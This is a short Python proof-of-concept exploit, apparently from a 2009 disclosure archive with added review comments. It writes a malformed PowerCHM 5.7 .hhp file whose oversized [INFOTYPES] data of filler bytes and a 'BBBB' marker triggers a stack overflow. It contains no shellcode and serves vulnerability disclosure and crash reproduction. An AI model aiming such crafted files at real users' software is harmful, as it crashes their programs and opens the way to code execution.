# Title : PowerCHM 5.7 (hhp File) Stack Overflow poC
# Published : 2009-03-27
# Author : Encrypt3d.M!nd
# exploit.py
# PowerCHM 5.7 (hhp file) Stack overflow PoC
# By:Encrypt3d.M!nd
#
# Originally discovered by:
# Biks Security (http://security.biks.vn/?p=365)
#
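# Builds a malformed HTML Help project file (poc.hhp) for crash reproduction
# against PowerCHM 5.7, which the page title describes as a stack overflow in
# .hhp handling.
#
# NOTE(review): the published listing had lost its backslashes ("n" for "\n",
# "x41" for "\x41"), so it wrote those characters literally instead of line
# breaks and filler bytes. The escapes are restored below so the output has
# the line-oriented .hhp layout the section headers imply.

# A syntactically ordinary project file: every section is well-formed, so the
# parser reaches the oversized data that follows [INFOTYPES].
header = (
    "[OPTIONS]\n"
    "Compatibility=1.1 or later\n"
    "Compiled file=bratax.chm\n"
    "Contents file=aaaaaa.hhc\n"
    "Index file=aaaaaa.hhk\n"
    "Language=0x813 Dutch (Belgium)\n"
    "Title=\n"
    "Error log file=Errlog.txt\n"
    "Default Window=main\n\n"
    "[WINDOWS]\n"
    'main="","aaaaaa.hhc","aaaaaa.hhk","","",,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n'
    "[FILES]\n\n"
    "[INFOTYPES]\n"
)

# Recognisable filler only, no executable content: 999 x 'A', a 4-byte 'BBBB'
# marker, then 500 x 'C'.
# NOTE(review): presumably the marker is what shows up in the overwritten
# control data when the crash is triaged in a debugger; the page does not
# state the offset, so confirm before relying on it.
payload = "\x41" * 999 + "\x42\x42\x42\x42" + "\x43" * 500

# The context manager closes the handle even if the write fails, and the name
# avoids shadowing the Python 2 builtin `file`.
with open('poc.hhp', 'w') as poc_file:
    poc_file.write(header + payload)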